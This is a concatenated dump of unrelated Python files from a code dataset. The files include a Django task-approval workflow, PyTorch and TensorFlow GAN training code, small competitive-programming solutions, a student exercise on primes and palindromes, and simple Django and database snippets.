        valid = all([act.valid for act in self.actions])
        if not valid:
            # TODO(amelia): get action invalidation reasons and raise those
            raise exceptions.TaskActionsInvalid(
                self.task, "actions invalid", internal_message
            )

    @property
    def approved(self):
        return self.task.approved

    @property
    def completed(self):
        return self.task.completed

    @property
    def cancelled(self):
        return self.task.cancelled

    def confirm_state(self, approved=None, completed=None, cancelled=None):
        """Check that the Task is in a given state.
        None value means state is ignored. Otherwise expects true or false.
        """
        if completed is not None:
            if self.task.completed and not completed:
                raise exceptions.TaskStateInvalid(
                    self.task, "This task has already been completed."
                )
            if not self.task.completed and completed:
                raise exceptions.TaskStateInvalid(
                    self.task, "This task hasn't been completed."
                )
        if cancelled is not None:
            if self.task.cancelled and not cancelled:
                raise exceptions.TaskStateInvalid(
                    self.task, "This task has been cancelled."
                )
            if not self.task.cancelled and cancelled:
                raise exceptions.TaskStateInvalid(
                    self.task, "This task has not been cancelled."
                )
        if approved is not None:
            if self.task.approved and not approved:
                raise exceptions.TaskStateInvalid(
                    self.task, "This task has already been approved."
                )
            if not self.task.approved and approved:
                raise exceptions.TaskStateInvalid(
                    self.task, "This task has not been approved."
                )

    def update(self, action_data):
        """Replace the task's action data with newly validated data,
        then re-run the prepare stage."""
        self.confirm_state(approved=False, completed=False, cancelled=False)
        action_serializer_list = self._instantiate_action_serializers(
            action_data, use_existing_actions=True
        )
        hash_key = self._create_task_hash(action_serializer_list)
        self._handle_duplicates(hash_key)
        for action in action_serializer_list:
            data = action["serializer"].validated_data
            action["action"].action.action_data = data
            action["action"].action.save()
        self._refresh_actions()
        self.prepare()

    def prepare(self):
        """Run the prepare stage for all the actions.
        If the task can be auto approved, this will also run the approve
        stage.
        """
        self.confirm_state(approved=False, completed=False, cancelled=False)
        for action in self.actions:
            try:
                action.prepare()
            except Exception as e:
                handle_task_error(e, self.task, error_text="while setting up task")
        # send initial confirmation email:
        email_conf = self.config.emails.initial
        send_stage_email(self.task, email_conf)
        approve_list = [act.auto_approve for act in self.actions]
        # TODO(amelia): It would be nice to explicitly test this, however
        #               currently we don't have the right combinations of
        #               actions to allow for it.
        # Any action voting False vetoes auto-approval; otherwise at least
        # one explicit True is required.
        if False in approve_list:
            can_auto_approve = False
        elif True in approve_list:
            can_auto_approve = True
        else:
            can_auto_approve = False
        if self.config.allow_auto_approve is not None:
            allow_auto_approve = self.config.allow_auto_approve
        else:
            allow_auto_approve = self.allow_auto_approve
        if can_auto_approve and not allow_auto_approve:
            self.add_note("Actions allow auto aproval, but task does not.")
        elif can_auto_approve:
            self.add_note("Action allow auto approval. Auto approving.")
            self.approve()
            return
        if self.send_approval_notification:
            notes = {"notes": ["'%s' task needs approval." % self.task_type]}
            create_notification(self.task, notes)

    def approve(self, approved_by="system"):
        """Run the approve stage for all the actions."""
        self.confirm_state(completed=False, cancelled=False)
        self.is_valid("task invalid before approval")
        # We approve the task before running actions,
        # that way if something goes wrong we know if it was approved,
        # when it was approved, and who approved it.
        self.task.approved = True
        self.task.approved_on = timezone.now()
        self.task.approved_by = approved_by
        self.task.save()
        # approve all actions
        for action in self.actions:
            try:
                action.approve()
            except Exception as e:
                handle_task_error(e, self.task, error_text="while approving task")
        self.is_valid("task invalid after approval")
        need_token = any([act.need_token for act in self.actions])
        if need_token:
            self._create_token()
        else:
            self.submit()

    def reissue_token(self):
        """Issue a fresh token for an approved task if any action needs one."""
        self.confirm_state(approved=True, completed=False, cancelled=False)
        need_token = any([act.need_token for act in self.actions])
        if need_token:
            self._create_token()

    def clear_tokens(self):
        # Invalidate every outstanding token for this task.
        for token in self.task.tokens:
            token.delete()

    def submit(self, token_data=None, keystone_user=None):
        """Run the submit stage for all actions and mark the task complete.

        Gathers the token fields the actions require from ``token_data``;
        raises TaskTokenSerializersInvalid when required fields are missing
        or the payload is not a key-value object.
        """
        self.confirm_state(approved=True, completed=False, cancelled=False)
        required_fields = set()
        actions = []
        for action in self.task.actions:
            a = action.get_action()
            actions.append(a)
            for field in a.token_fields:
                required_fields.add(field)
        if not token_data:
            token_data = {}
        errors = {}
        data = {}
        for field in required_fields:
            try:
                data[field] = token_data[field]
            except KeyError:
                errors[field] = [
                    "This field is required.",
                ]
            except TypeError:
                errors = ["Improperly formated json. " "Should be a key-value object."]
                break
        if errors:
            raise exceptions.TaskTokenSerializersInvalid(self.task, errors)
        self.is_valid("task invalid before submit")
        for action in actions:
            try:
                action.submit(data, keystone_user)
            except Exception as e:
                handle_task_error(e, self.task, "while submiting task")
        self.is_valid("task invalid after submit")
        self.task.completed = True
        self.task.completed_on = timezone.now()
        self.task.save()
        for token in self.task.tokens:
            token.delete()
        # Sending confirmation email:
        email_conf = self.config.emails.completed
        send_stage_email(self.task, email_conf)

    def cancel(self):
        """Cancel the task and invalidate any outstanding tokens."""
        self.confirm_state(completed=False, cancelled=False)
        self.clear_tokens()
        self.task.cancelled = True
        self.task.save()
|
7,682 | 6ef78e4308f6e693f50df714a5d7af1785e49d7a |
from utils import *
import copy
import torch.nn as nn
CUDA = torch.cuda.is_available()
def train_one_epoch(data_loader, net, loss_fn, optimizer):
    """Train ``net`` for one epoch over ``data_loader``.

    Returns:
        (mean_loss, predictions, targets) where predictions and targets
        are flat Python lists accumulated over all batches.
    """
    net.train()
    tl = Averager()
    pred_train = []
    act_train = []
    for i, (x_batch, y_batch) in enumerate(data_loader):
        if CUDA:
            x_batch, y_batch = x_batch.cuda(), y_batch.cuda()
        out = net(x_batch)
        loss = loss_fn(out, y_batch)
        _, pred = torch.max(out, 1)
        # Use .item() so only the Python scalar is accumulated; adding the
        # loss tensor itself (as before) keeps the whole autograd graph
        # alive for the entire epoch, and is also inconsistent with predict().
        tl.add(loss.item())
        pred_train.extend(pred.data.tolist())
        act_train.extend(y_batch.data.tolist())
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()
    return tl.item(), pred_train, act_train
def predict(data_loader, net, loss_fn):
    """Evaluate ``net`` on ``data_loader`` without gradient tracking.

    Returns (mean_loss, predictions, targets), matching train_one_epoch.
    """
    net.eval()
    val_loss = Averager()
    predictions = []
    targets = []
    with torch.no_grad():
        for x_batch, y_batch in data_loader:
            if CUDA:
                x_batch, y_batch = x_batch.cuda(), y_batch.cuda()
            out = net(x_batch)
            val_loss.add(loss_fn(out, y_batch).item())
            predictions.extend(torch.max(out, 1)[1].data.tolist())
            targets.extend(y_batch.data.tolist())
    return val_loss.item(), predictions, targets
def set_up(args):
    """Select the GPU, ensure the save directory exists, and fix the seed."""
    set_gpu(args.gpu)
    ensure_path(args.save_path)
    torch.manual_seed(args.random_seed)
    # Deterministic cuDNN kernels for reproducibility (may be slower).
    torch.backends.cudnn.deterministic = True
def train(args, data_train, label_train, data_val, label_val, subject, fold):
    """Train a model for one subject/fold and return the best val accuracy.

    Runs args.max_epoch epochs, logging per-epoch metrics into a trlog
    dict saved under <save_path>/log_train. The best-so-far model (by
    validation accuracy) is checkpointed as 'max-acc.pth' and, when
    args.save_model is set, also under a per-subject/fold name for
    later reproduction.
    """
    seed_all(args.random_seed)
    save_name = '_sub' + str(subject) + '_trial' + str(fold)
    set_up(args)
    train_loader = get_dataloader(data_train, label_train, args.batch_size)
    val_loader = get_dataloader(data_val, label_val, args.batch_size)
    model = get_model(args)
    para = get_trainable_parameter_num(model)
    print('Model {} size:{}'.format(args.model, para))
    if CUDA:
        model = model.cuda()
    optimizer = torch.optim.Adam(model.parameters(), lr=args.learning_rate)
    loss_fn = nn.CrossEntropyLoss()
    def save_model(name):
        # Overwrite any previous checkpoint with the same name.
        previous_model = osp.join(args.save_path, '{}.pth'.format(name))
        if os.path.exists(previous_model):
            os.remove(previous_model)
        torch.save(model.state_dict(), osp.join(args.save_path, '{}.pth'.format(name)))
    # Training log: per-epoch metrics plus the best validation accuracy.
    trlog = {}
    trlog['args'] = vars(args)
    trlog['train_loss'] = []
    trlog['val_loss'] = []
    trlog['train_acc'] = []
    trlog['val_acc'] = []
    trlog['max_acc'] = 0.0
    timer = Timer()
    for epoch in range(1, args.max_epoch + 1):
        loss_train, pred_train, act_train = train_one_epoch(
            data_loader=train_loader, net=model, loss_fn=loss_fn, optimizer=optimizer)
        acc_train, f1_train, _ = get_metrics(y_pred=pred_train, y_true=act_train)
        print('epoch {}, loss={:.4f} acc={:.4f} f1={:.4f}'
              .format(epoch, loss_train, acc_train, f1_train))
        loss_val, pred_val, act_val = predict(
            data_loader=val_loader, net=model, loss_fn=loss_fn
        )
        acc_val, f1_val, _ = get_metrics(y_pred=pred_val, y_true=act_val)
        print('epoch {}, val, loss={:.4f} acc={:.4f} f1={:.4f}'.
              format(epoch, loss_val, acc_val, f1_val))
        if acc_val > trlog['max_acc']:
            trlog['max_acc'] = acc_val
            save_model('max-acc')
            if args.save_model:
                # save model here for reproduce
                model_name_reproduce = 'sub' + str(subject) + '_fold' + str(fold) + '.pth'
                data_type = 'model_{}_{}_{}'.format(args.dataset, args.data_format, args.label_type)
                save_path = osp.join(args.save_path, data_type)
                ensure_path(save_path)
                model_name_reproduce = osp.join(save_path, model_name_reproduce)
                torch.save(model.state_dict(), model_name_reproduce)
        trlog['train_loss'].append(loss_train)
        trlog['train_acc'].append(acc_train)
        trlog['val_loss'].append(loss_val)
        trlog['val_acc'].append(acc_val)
        print('ETA:{}/{} SUB:{} FOLD:{}'.format(timer.measure(), timer.measure(epoch / args.max_epoch),
                                                subject, fold))
    save_name_ = 'trlog' + save_name
    ensure_path(osp.join(args.save_path, 'log_train'))
    torch.save(trlog, osp.join(args.save_path, 'log_train', save_name_))
    return trlog['max_acc']
def test(args, data, label, reproduce, subject, fold):
    """Evaluate a trained model on held-out data.

    When ``reproduce`` is truthy the per-subject/fold checkpoint written
    during training is loaded; otherwise args.load_path is used.
    Returns (accuracy, predictions, targets).
    """
    seed_all(args.random_seed)
    set_up(args)
    test_loader = get_dataloader(data, label, args.batch_size, False)
    model = get_model(args)
    if CUDA:
        model = model.cuda()
    loss_fn = nn.CrossEntropyLoss()
    if reproduce:
        checkpoint_name = 'sub' + str(subject) + '_fold' + str(fold) + '.pth'
        data_type = 'model_{}_{}_{}'.format(args.dataset, args.data_format, args.label_type)
        save_path = osp.join(args.save_path, data_type)
        ensure_path(save_path)
        checkpoint = osp.join(save_path, checkpoint_name)
    else:
        checkpoint = args.load_path
    model.load_state_dict(torch.load(checkpoint))
    loss, pred, act = predict(data_loader=test_loader, net=model, loss_fn=loss_fn)
    acc, f1, cm = get_metrics(y_pred=pred, y_true=act)
    print('>>> Test: loss={:.4f} acc={:.4f} f1={:.4f}'.format(loss, acc, f1))
    return acc, pred, act
|
7,683 | 14d31a4b7491a7f7a64cd151e79c23546e4a3cd2 | #ABC114 A - クイズ
print("ABC" if input()=="1" else "chokudai")
|
7,684 | aaa9665ac6d639e681fddd032058f490ce36d12a | from django.shortcuts import render
from django.views.generic import DetailView
from .models import Course
# Create your views here.
def courses_list_view(request):
    """Render the course catalogue page listing every Course."""
    courses = Course.objects.all()
    context = {
        "object_list": courses,
        "title": "دوره ها",
    }
    return render(request, "courses/courses_list.html", context)
class CoursesDetailView(DetailView):
    """Detail page for a single Course."""

    queryset = Course.objects.all()
    template_name = "courses/course.html"

    def get_context_data(self, *args, object_list=None, **kwargs):
        """Return the default template context.

        Removed the leftover debug ``print(context)`` that dumped the
        context to stdout on every request.
        """
        context = super(CoursesDetailView, self).get_context_data(*args, **kwargs)
        return context
|
7,685 | ba26aa2f33983019b515c5ea287bd5d5d190eeac | N,M=map(int,input().split())
if N>=M//2:
print(M//2)
else:
answer=N
M-=2*N
N=0
print(answer+M//4) |
7,686 | ca6a9656efe439c9e90f2724e38e652a09e46dae | """
Test 1, problem 1.
Authors: David Mutchler, Dave Fisher, Valerie Galluzzi, Amanda Stouder,
their colleagues and Nathan Gupta. March 2016.
""" # DONE: 1. PUT YOUR NAME IN THE ABOVE LINE.
def main():
""" Calls the TEST functions in this module. """
test_problem1a()
test_problem1b()
test_problem1c()
def is_palindrome(n):
"""
What comes in: An non-negative integer n.
What goes out: Returns True if the given integer is a palindrome,
that is, if it reads the same backwards and forwards.
Returns False if the given integer is not a palindrome.
Side effects: None.
Examples:
-- if n is 12344321 this function returns True
-- if n is 121121 this function returns True
-- if n is 372273 this function returns True
-- if n is 88 this function returns True
-- if n is 808 this function returns True
-- if n is 1 this function returns True
-- if n is 6556 this function returns True
-- if n is 6557 this function returns False
-- if n is 228 this function returns False
-- if n is 81 this function returns False
"""
####################################################################
# Ask your instructor for help if you do not understand
# the green doc-string above.
####################################################################
forwards = str(n)
backwards = str(n)[::-1]
return forwards == backwards
# ------------------------------------------------------------------
# Students:
# Do NOT touch the above is_palindrome function
# - it has no TODO.
# Do NOT copy code from this function.
#
# Instead, ** CALL ** this function as needed in the problems below.
# ------------------------------------------------------------------
def is_prime(n):
    """
    What comes in: An integer n >= 2.
    What goes out: True if the given integer is prime, else False.
    Side effects: None.
    Examples:
       -- is_prime(11) returns True
       -- is_prime(12) returns False
       -- is_prime(2) returns True
    Note: trial division now stops at sqrt(n): a divisor above sqrt(n)
    would imply a cofactor below it, so checking further is redundant.
    """
    k = 2
    while k * k <= n:
        if n % k == 0:
            return False
        k += 1
    return True
# ------------------------------------------------------------------
# Students:
# Do NOT touch the above is_prime function - it has no TODO.
# Do NOT copy code from this function.
#
# Instead, ** CALL ** this function as needed in the problems below.
# ------------------------------------------------------------------
def test_problem1a():
    """ Tests the problem1a function. """
    print()
    print('--------------------------------------------------')
    print('Testing the problem1a function:')
    print('--------------------------------------------------')
    # (m, p, expected) cases; the last one takes a while but does finish.
    cases = [
        (5, 2, 95),
        (10, 3, 1576),
        (15, 4, 32312),
        (20, 5, 639655),
        (25, 6, 13321704),
        (30, 7, 283359305),
    ]
    for number, (m, p, expected) in enumerate(cases, start=1):
        answer = problem1a(m, p)
        print('Test {} expected:'.format(number), expected)
        print(' actual: ', answer)
def problem1a(m, p):
    """
    What comes in: Positive integers m and p,
      with m >= 2 and (5 raised to the pth power) >= m.
    What goes out: Returns the sum of all the integers
      between m and (5 raised to the pth power), inclusive,
      that are prime.
    Side effects: None.
    Examples:
      -- problem1a(11, 2) returns 83  (11 + 13 + 17 + 19 + 23)
      -- problem1a(70, 3) returns 1025
      -- problem1a(2, 1) returns 10   (2 + 3 + 5)
      -- problem1a(1000, 6) returns 13245677
    """
    # Uses the module's is_prime helper, as required.
    return sum(k for k in range(m, 5 ** p + 1) if is_prime(k))
def test_problem1b():
    """ Tests the problem1b function. """
    print()
    print('--------------------------------------------------')
    print('Testing the problem1b function:')
    print('--------------------------------------------------')
    # The same 18 cases as before, now table-driven:
    # each entry pairs the (m, p) arguments with the expected result.
    cases = [
        ((17, 2), True),
        ((18, 2), False),
        ((85, 3), True),
        ((89, 3), True),
        ((90, 3), False),
        ((449, 4), False),
        ((450, 4), True),
        ((457, 4), True),
        ((458, 4), False),
        ((569, 5), False),
        ((570, 5), True),
        ((571, 5), True),
        ((572, 5), False),
        ((15610, 6), True),
        ((15600, 6), False),
        ((10000, 6), False),
        ((5861, 6), True),
        ((5862, 6), False),
    ]
    for number, (args, expected) in enumerate(cases, start=1):
        answer = problem1b(*args)
        print()
        print('Test', number, 'expected:', expected)
        print('    actual:     ', answer)
        if expected != answer:
            print('  **** THIS TEST FAILED. ****')
def problem1b(m, p):
    """
    What comes in: Positive integers m and p,
      with m >= 2 and (5 raised to the pth power) >= m.
    What goes out: Let X = the sum of all the integers
      between m and (5 raised to the pth power), inclusive,
      that are prime.  Returns True if X is prime, False otherwise.
    Side effects: None.
    Examples:
      -- If m is 17 and p = 2: 17 + 19 + 23 = 59, which IS prime,
         so this function returns True.
      -- If m is 18 and p = 2: 19 + 23 = 42, which is NOT prime,
         so this function returns False.
      -- If m is 85 and p = 3: the primes between 85 and 125 sum
         to 719, which IS prime, so this function returns True.
    """
    # problem1a computes the prime sum; is_prime already yields a bool,
    # so the previous `if ... == True: return True / else: return False`
    # ladder collapses to a single return.
    return is_prime(problem1a(m, p))
def test_problem1c():
    """ Tests the problem1c function. """
    print()
    print('--------------------------------------------------')
    print('Testing the problem1c function:')
    print('--------------------------------------------------')
    # The same 14 cases as before, now table-driven:
    # each entry pairs the (m, n) arguments with the expected product
    # (kept in "palindrome-count * prime-count" form for readability).
    cases = [
        ((50, 100), 5 * 10),
        ((23, 53), 2 * 8),
        ((33, 53), 2 * 5),
        ((20, 22), 1 * 0),
        ((101, 131), 4 * 7),
        ((102, 130), 2 * 5),
        ((2, 1000), 107 * 168),
        ((1000, 10000), 90 * 1061),
        ((101, 929), 83 * 133),
        ((100, 930), 83 * 133),
        ((102, 928), 81 * 131),
        ((101, 928), 82 * 132),
        ((102, 929), 82 * 132),
        ((100, 20000), 280 * 2237),
    ]
    for number, (args, expected) in enumerate(cases, start=1):
        answer = problem1c(*args)
        print()
        print('Test', number, 'expected:', expected)
        print('    actual:     ', answer)
        if expected != answer:
            print('  **** THIS TEST FAILED. ****')
def problem1c(m, n):
    """
    What comes in: Positive integers m and n, with m <= n.
    What goes out: Returns the product XY where:
      -- X is the number of integers from m to n, inclusive,
           that are PALINDROMES.
      -- Y is the number of integers from m to n, inclusive,
           that are PRIME.
    Side effects: None.
    Examples:
      -- If m is 50 and n is 100: palindromes are 55 66 77 88 99
         (5 of them) and there are 10 primes, so this returns 50.
      -- If m is 23 and n is 53: 2 palindromes (33 44) and 8 primes,
         so this returns 16.
    """
    # is_palindrome and is_prime return booleans, so the previous
    # `== True` comparisons were redundant; count each property with
    # a generator expression instead of manual counters.
    palindrome_count = sum(1 for k in range(m, n + 1) if is_palindrome(k))
    prime_count = sum(1 for k in range(m, n + 1) if is_prime(k))
    return palindrome_count * prime_count
# ----------------------------------------------------------------------
# Calls main to start the ball rolling.
# NOTE(review): this runs at import time; guarding with
#   if __name__ == '__main__':
# would let the module be imported without executing the tests.
# ----------------------------------------------------------------------
main()
|
7,687 | 5c80561a3344c0240e59500e5dadc1f1ef7f380e | str="mama"
# NOTE(review): `str` (bound on the previous line) shadows the builtin.
stringlength=len(str)  # length of the string to reverse
slicedString=str[stringlength::-1]  # step -1 walks from the end back to index 0
print (slicedString)  # prints "amam" for the input "mama"
7,688 | 7633944366c6655306bc41087b19a474e9c414b5 | from django.contrib import admin
from .models import Spot
from leaflet.admin import LeafletGeoAdmin
class SpotAdmin(LeafletGeoAdmin):
    # Leaflet-backed admin class: inherits the interactive-map widget
    # for geometry fields; no further customisation needed.
    pass
admin.site.register(Spot, SpotAdmin)  # expose Spot in the Django admin site
|
7,689 | ea045d04b40341f34c780dceab1f21df93b7207a | # A class is like a blueprint for creating objects. An object has properties and methods(functions) associated with it. Almost everything in Python is an object
# import connect
# from connect import connect
#create class
import pymysql
# import MySQLdb
conn = pymysql.connect(host='127.0.0.1',user='root',password='',db='Python')
connect = conn.cursor()
class User():
    """A user record; getUserInfo reads from the module-level DB cursor."""
    # Constructor: store the basic identity fields.
    def __init__(self, name,email,age):
        self.name = name
        self.email = email
        self.age = age
    def getUserInfo(self):
        """Query all rows from `students` and print them.

        Uses the module-level `connect` cursor opened at import time.
        NOTE(review): the loop prints the ENTIRE result set once per row
        (`new_data` is never used) -- presumably `new_data` or the
        commented-out per-row f-string was intended; confirm.
        """
        # return f'His name is {self.name} and his age is {self.age}'
        # conn = pymysql.connect(host='127.0.0.1',user='root',password='',db='Python')
        # connect = conn.cursor()
        user_data = 'select * from students;'
        connect.execute(user_data)
        data = connect.fetchall()
        i=0
        for new_data in data:
            # print(f'student name is {data[i][1]} {data[i][2]} and age is {data[i][3]}')
            print(data)
            i += 1
        # return connect.fetchall()
    def IncreaseAge(self):
        # Bump the stored age by one year.
        self.age += 1
class Customer(User):
    """A User with an account balance."""

    def __init__(self, name,email,age):
        # Reuse User's initialisation instead of duplicating the three
        # field assignments, then add the Customer-specific state.
        super().__init__(name, email, age)
        self.balance = 0

    def getBalance(self,balance):
        """Set the customer's balance (name kept for compatibility)."""
        self.balance = balance
#Init User object
brad = User('Kaushal Patel','kaushalpatel089@gmail.com',22)
customer = Customer('Babulal Kumawat','babubhai@gmail.com',22)
# brad.IncreaseAge()
# customer.getBalance(22)
# print(customer.getUserInfo())
# print(brad.getUserInfo())
# print(brad.getUserInfo())
# brad.getUserInfo()
brad.getUserInfo() |
7,690 | 39643454cbef9e6fa7979d0f660f54e07d155bc7 | #!/usr/bin/env python3
'''Testing File'''
import tensorflow.keras as K
def test_model(network, data, labels, verbose=True):
    """Evaluate a trained network on the given data and labels.

    Thin wrapper around the model's ``evaluate`` method; returns
    whatever ``evaluate`` returns for these inputs.
    """
    result = network.evaluate(x=data, y=labels, verbose=verbose)
    return result
|
7,691 | 8766003a85b1ed83927988df147b0b3004cb91f9 | def solution(name):
    # Greedy cursor problem: starting from an all-'A' string, find the
    # minimum total cost (letter up/down steps + left/right cursor moves)
    # to type `name`.  Tries the forward-only sweep, then every split
    # point "go right to i, then wrap around and finish from the right".
    Len = len(name)
    nameList = [name[i] for i in range(Len)]
    nameField = ['A' for i in range(Len)]
    answer = 0
    # Forward-only sweep.
    for i in range(Len):
        a = ord(nameField[i])
        b = ord(nameList[i])
        if b-a <= 13 : # at most half the alphabet: step upward
            answer += b-a
        else : # more than half: wrap the other way (26 - diff)
            answer += 26 - (b-a)
        nameField[i] = nameList[i] # mark done (name itself may contain 'A')
        if nameField == nameList : # stop as soon as the target is complete
            break
        answer +=1 # +1 for the cursor move to the next position
    dap = answer
    # Forward up to a split point, then backward from the end.
    t = (int)(Len/2)
    for i in range(t): # split point in [0, Len/2)
        nameField = ['A' for i in range(Len)]
        answer = i
        for j in range(i+1): # forward part: positions 0..i
            a = ord(nameField[j])
            b = ord(nameList[j])
            if b-a <= 13 :
                answer += b-a
            else :
                answer += 26 - (b-a)
            nameField[j] = nameList[j]
            if nameField == nameList :
                break
            answer +=1
        for j in range(Len-1,i,-1): # backward part: positions Len-1..i+1
            a = ord(nameField[j])
            b = ord(nameList[j])
            if b-a <= 13 :
                answer += b-a
            else :
                answer += 26 - (b-a)
            nameField[j] = nameList[j]
            if nameField == nameList :
                break
            answer +=1
        dap = min(dap,answer)
    return dap
'''
중복코드로 많아 함수로 빼고싶었지만..패쓰!
정방향의 가중치와
정방향으로 0~길이/2 만큼까지 가고 + 역방향 가면서
원하는 name만들어졌는지 계속 체크!
최소가중치를 구해서 출력!!
''' |
7,692 | ea876d903263c907f63b2f37a81f2576345dae62 | botnet = open("bots.txt","r")
bots = botnet.read()  # whole file contents as a single string
print(bots.split('\n'))  # print the list of lines (split on newline)
botnet.close()  # NOTE(review): a `with open(...)` block would close this automatically
7,693 | d3b00a8d410248aedb1c43354e89ccc298b56a3c | # -*- coding: utf-8 -*-
# @Time : 2020/3/4 10:34
# @Author : YYLin
# @Email : 854280599@qq.com
# @File : Skip_GAN.py
from Dataload import load_anime_old, save_images, load_CelebA
from Srresnet_Model import Generator_srresnet, Discriminator_srresnet
import tensorflow as tf
import numpy as np
import sys
class Skip_GAN(object):
    """AC-GAN-style model built from SRResNet generator/discriminator blocks.

    The discriminator produces both a real/fake score and class logits;
    ``self.la`` weights the adversarial (real/fake) term against the
    classification term in both players' losses.
    """
    def __init__(self, sess, epoch, batch_size, dataset_name, result_dir, z_dim, y_dim, checkpoint_dir, num_resblock,
                 Cycle_lr, Class_weight, Resnet_weight):
        self.sess = sess
        self.dataset_name = dataset_name
        self.result_dir = result_dir
        self.epoch = epoch
        self.batch_size = batch_size
        self.z_dim = z_dim
        self.y_dim = y_dim
        self.checkpoint_dir = checkpoint_dir
        self.num_resblock = num_resblock
        self.Cycle_lr = Cycle_lr
        self.Class_weight = Class_weight
        # La is used to increase the weight of image authenticity
        self.la = 10
        self.learningRateD = 2e-4
        self.learningRateG = 2e-4
        self.Resnet_weight = Resnet_weight
        # Load the selected dataset.
        if self.dataset_name == 'anime':
            print('loading anime .............')
            self.height = 96
            self.width = 96
            self.c_dim = 3
            self.data_X, self.data_Y = load_anime_old()
            print('self.data_X:', self.data_X.shape, 'self.data_y:', self.data_Y.shape)
        elif self.dataset_name == 'celebA':
            print('loading celebA ...............')
            self.height = 96
            self.width = 96
            self.c_dim = 3
            self.data_X, self.data_Y = load_CelebA()
            print('self.data_X:', self.data_X.shape, 'self.data_y:', self.data_Y.shape)
        else:
            print('Sorry there is no option for ', self.dataset_name)
            sys.exit()
    def build_model(self):
        """Build placeholders, the G/D graphs, losses and optimizers."""
        # Placeholders for labels, real images and the noise vector.
        self.y = tf.placeholder(tf.float32, [None, self.y_dim], name='y')
        self.img = tf.placeholder(tf.float32, [self.batch_size, self.height, self.width, 3], name='img')
        self.z = tf.placeholder(tf.float32, [None, self.z_dim])
        self.G_sample = Generator_srresnet(self.z, self.y, self.num_resblock, self.Resnet_weight)
        print('The return of Generator:', self.G_sample)
        # Discriminator's verdict on real images.
        D_real, C_real = Discriminator_srresnet(self.img, dataset=self.dataset_name)
        print('The return of Discriminator:', D_real, C_real)
        # Discriminator's verdict on generated images (shared weights).
        D_fake, C_fake = Discriminator_srresnet(self.G_sample, dataset=self.dataset_name, reuse=True)
        print('The return of Discriminator:', D_fake, C_fake)
        # Classification losses on real and generated images.
        self.C_real_loss = tf.reduce_mean(
            tf.reduce_sum(tf.nn.sigmoid_cross_entropy_with_logits(logits=C_real, labels=self.y), axis=1))
        self.C_fake_loss = tf.reduce_mean(
            tf.reduce_sum(tf.nn.sigmoid_cross_entropy_with_logits(logits=C_fake, labels=self.y), axis=1))
        # D loss: real images should be judged 1, generated images 0.
        D_real_loss = tf.reduce_mean(
            tf.nn.sigmoid_cross_entropy_with_logits(logits=D_real, labels=tf.ones_like(D_real)))
        D_fake_loss = tf.reduce_mean(
            tf.nn.sigmoid_cross_entropy_with_logits(logits=D_fake, labels=tf.zeros_like(D_fake)))
        # NOTE: `la` is the knob to watch when cycling the learning rate;
        # the goal is to grow the classification term's influence rather
        # than the real/fake term's.
        D_loss = D_real_loss + D_fake_loss
        self.DC_loss = (self.la * D_loss + self.C_real_loss)
        # Generator loss: fool the discriminator and match the class labels.
        G_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=D_fake, labels=tf.ones_like(D_fake)))
        self.GC_loss = (self.la * G_loss + self.C_fake_loss)
        print('Calualtion the loss of Optimizer')
        self.theta_D = [v for v in tf.global_variables() if 'd_net' in v.name]
        self.theta_G = [v for v in tf.global_variables() if 'g_net' in v.name]
        with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):
            self.d_updates = tf.train.AdamOptimizer(self.learningRateD, beta1=0.5, beta2=0.9).minimize(self.DC_loss,
                                                                                                       var_list=self.theta_D)
            self.g_updates = tf.train.AdamOptimizer(self.learningRateG, beta1=0.5, beta2=0.9).minimize(self.GC_loss,
                                                                                                       var_list=self.theta_G)
        # BUG FIX: the arguments were (self.y, self.z) -- noise and labels
        # swapped relative to the G_sample call above.  The sampler must
        # rebuild the same graph with (z, y) for reuse=True to make sense.
        self.sampler = Generator_srresnet(self.z, self.y, self.num_resblock, self.Resnet_weight, reuse=True, train=False)
    def train(self):
        """Run the alternating D/G update loop, saving samples and checkpoints."""
        print('begin training ...........')
        tf.global_variables_initializer().run()
        # sample_num caps how many generated images are tiled per saved grid.
        sample_num = 64
        tot_num_samples = min(sample_num, self.batch_size)
        manifold_h = int(np.floor(np.sqrt(tot_num_samples)))
        manifold_w = int(np.floor(np.sqrt(tot_num_samples)))
        # Fixed noise/labels so saved sample grids are comparable over time.
        self.sample = np.random.uniform(-1, 1, size=(self.batch_size, self.z_dim)).astype(np.float32)
        self.sample_y = self.data_Y[0:self.batch_size]
        counter = 0
        # Shuffle the dataset once before the first pass.
        batch_offset = 0
        data_index = np.arange(self.data_X.shape[0])
        np.random.shuffle(data_index)
        self.data_X = self.data_X[data_index, :, :, :]
        self.data_Y = self.data_Y[data_index]
        # NOTE: this scheme drops the final < batch_size leftover samples
        # of each pass (the offset wraps and the data is reshuffled).
        for epoch in range(self.epoch):
            if batch_offset + self.batch_size > len(self.data_X):
                batch_offset = 0
                # shuffle dataset
                data_index = np.arange(self.data_X.shape[0])
                np.random.shuffle(data_index)
                self.data_X = self.data_X[data_index, :, :, :]
                self.data_Y = self.data_Y[data_index]
            else:
                # Slice the next mini-batch and draw fresh noise.
                batch_images = self.data_X[batch_offset:batch_offset + self.batch_size]
                batch_codes = self.data_Y[batch_offset:batch_offset + self.batch_size]
                batch_z = np.random.uniform(-1, 1, [self.batch_size, self.z_dim]).astype(np.float32)
                # Update the discriminator (3 steps per generator step).
                for i_d_loss in range(3):
                    _, d_loss = self.sess.run([self.d_updates, self.DC_loss], feed_dict={self.img: batch_images,
                                                                                         self.y: batch_codes,
                                                                                         self.z: batch_z})
                for i_g_loss in range(1):
                    # Then update the generator.
                    _, g_loss, _ = self.sess.run([self.g_updates, self.GC_loss, self.G_sample],
                                                 feed_dict={self.y: batch_codes, self.img: batch_images, self.z: batch_z})
                batch_offset = batch_offset + self.batch_size
            # display the loss every 10 steps
            if (counter % 10) == 0:
                print('Epoch: %2d counter: %5d d_loss: %.8f, g_loss: %.8f' % (epoch, counter, d_loss, g_loss))
            # save image every 500 steps
            if counter % 500 == 0:
                samples = self.sess.run(self.sampler,
                                        feed_dict={self.z: self.sample, self.y: self.sample_y})
                save_images(samples[:manifold_h * manifold_w, :, :, :], [manifold_h, manifold_w],
                            self.result_dir + '/{}.png'.format(str(counter).zfill(7)))
            # save the model every 1000 steps
            if counter % 1000 == 0:
                saver = tf.train.Saver(max_to_keep=5)
                saver.save(self.sess, self.checkpoint_dir + '/{}'.format(str(counter).zfill(7)))
            if (counter % 100) == 0:
                if self.Cycle_lr:
                    # Cyclic learning-rate decay with a reset floor.
                    self.learningRateD = self.learningRateD * 0.99
